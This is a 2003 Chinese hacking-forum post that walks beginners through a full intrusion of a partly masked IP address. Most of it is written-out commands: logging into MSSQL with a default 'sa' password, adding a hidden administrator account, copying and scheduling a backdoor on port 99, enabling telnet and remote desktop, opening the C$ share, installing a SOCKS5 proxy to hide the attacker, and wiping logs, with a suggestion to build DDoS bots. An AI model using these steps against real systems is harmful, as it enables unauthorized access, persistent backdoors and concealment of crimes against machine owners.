Board logo

标题: 一次详细全面的入侵 [打印本页]

作者: bigblock    时间: 2003-10-9 21:17     标题: 一次详细全面的入侵

现在网上所有的教程,差不多都是本着一种漏洞来进入系统,然后展开一系列的权限提升呀,留后门等工作 其实在网上来看教程及学习的人,百分之九十都是正在成长的兄弟,他们需要一个较全面的入侵报道,以便明白其中的秘密和关联,因此本文便产生了.没什么技术含量,主要面对初级用户.高手就不用看了.:) 注: 肉鸡为你已经得到权限的计算机 跳板则是在肉鸡的基础上被你做过内容,以方便自已的计算机 肉鸡: 211.75.X.X 照网站论坛上的提示,211.75.X.X的USER为administrator,PASSWD为空,方式IPC连接 习惯性的先PING了一下该网站 C:\>ping 211.75.X.X Pinging iceblood.yofor.com [211.75.X.X] with 32 bytes of data: Reply from 211.75.X.X: bytes=32 time<10ms TTL=254 Reply from 211.75.X.X: bytes=32 time<10ms TTL=254 Reply from 211.75.X.X: bytes=32 time<10ms TTL=254 Reply from 211.75.X.X: bytes=32 time<10ms TTL=254 Ping statistics for 211.75.X.X: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms 看来网站开通在,那就按提示IPC连接吧 注: IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的),它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。 C:\>net use \\211.75.X.X\IPC$ "" /user:"admintitrators" 系统发生1326错误 登陆失败:未知的用户名或错误密码 我晕,看来前来的兄弟将密码改了,还是自已动手吧 流光出场,看看可以扫到点什么有用的东东.十分钟后,流光扫描报告显示 PORT-> 主机 211.75.X.X 端口 0139 ...开放 PORT-> 主机 211.75.X.X 端口 0443 ...开放 PORT-> 主机 211.75.X.X 端口 080 ...开放 PORT-> 主机 211.75.X.X 端口 1433 ...开放 ......... 最下面探测到了流光的默认MSSQL密码为SA 哈哈,这回有的玩了 打开SuperSQLEXEC,在IP中填上211.75.X.X,在USER中输入sa ,连接 稍等一会,出来了,我们现在利用了MSSQL的默认密码这个漏洞进入倒对方的系统了 c:\net user admin administrator user aa bb lqh test xxxxx ldir like 看来这台机子上有不少USER,反正也不差咱们一个了, c:\net user kawen kawen /add 命令成功 c:\net localgroup administrators kawen /add 命令成功 OK,我们现在已成功的将KAWEN这个用户名加到管理员中去了. 退出SQL,我们现在又要转到IPC这边来了,打开DOS C:\>net use \\211.75.X.X\IPC$ "kawen" /user:"kawen" 命令完成 呵呵,看到没有,我们已经和对方IPC上了 现在要做的就是提升权限了,当然你可以用DameWare Mini Remote Control直接通过图形方式连上对方的计算机,就像3389一样. C:\>copy srv.exe \\211.75.X.X\admin$ C:\>net time \\211.75.X.X C:\>at \\211.75.X.X 11:05 srv.exe 以上三步是我们要启动可以打开99端口的后门软件SRV.EXE C:\>net time \\211.75.X.X 再查查到时间没有?如果211.75.X.X 的当前时间是 2002/6/1 上午 11:05,那就准备开始下面的命令 C:\>telnet 211.75.X.X 99 C:\WINNT\system32 成功了,不过SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务,也就是打开对方的23端口 copy ntlm.exe \\211.75.X.X\admin$ OK,我们直接运行C:\WINNT\system32>ntlm 当出现"DONE"的时候,就说明已经启动正常 然后我们使用net start telnet直接启动TELNET服务 OK,现在我们已经利用IPC进来了 下一步就是开一个3389端口,可以以图形方式直接登陆 请按以下步骤输入开启3389 c:\>query user c:\>echo [Components] > c:\kawen c:\>echo TSEnable = on >> c:\kawen //这是建立无人参与的安装参数 c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\kawen /q 如果没有意外的话,几分钟计算机就会重启, 我们就可以利用3389的客户端连上去了 到这里为止我们通过MSSQL,IPC,99端口及TELNET后后又建立了3389端口,现在这台计算机我们已基本控制了,现在还要做的就是建立一个代理服务器,以便我们可以在网上做到踏雪无痕, 代理服务器的首选应该是SkSockServer 怎么上传到我们控制的计算机中呢,其实有多种方法,我们不是开了对方的23端口了吗 telnet上去 TELNET 211.75.X.X C:\WINNT\SYSTEM32\NET SHARE C$ 这一条命令是开对方的共享,然后在本机上的开始运行中直接键入\\211.75.X.X就可以连上了,将SkSockServer拖到对方的C盘中就可以了.另外我们还可以利用流光的种植者直接种上去,也很简单 明白了吧 传上去后 c:\winnt\system32\sksockserver -install 开始安装SKSOCKSERVER c:\winnt\system32\sksockserver -config starttype 2 c:\winnt\system32\sksockserver -config port 8888 c:\winnt\system32\net start skserver 这样我们就开启了一个端口为8888的SOCK5代理服务器,放在你的QQ上用吧 现在算来,该做的也差不多了,是到要走的时候了,清扫一下吧 这一步在这里比较简单了,推荐使用SSSO-Friend,一款图形界面的软件,他会帮你清掉你的PP,很简单 到这里教程也完了 总结一下,我们用了SQL,IPC,共享,开了99端口,23端口,3389端口,最后还做了一个SOCK5的代理服务器.其实运用上面的手法,你还可以做TFTP服务器,做成用于DDOS攻击的傀儡机器等等.没什么技术含量,只是想告诉各位一个最简单的道理,多看书,多运用,将本身不相关的东西相连起来,就会成为一个完整的圆.




欢迎光临 黑色海岸线论坛 (http://bbs.thysea.com/) Powered by Discuz! 7.2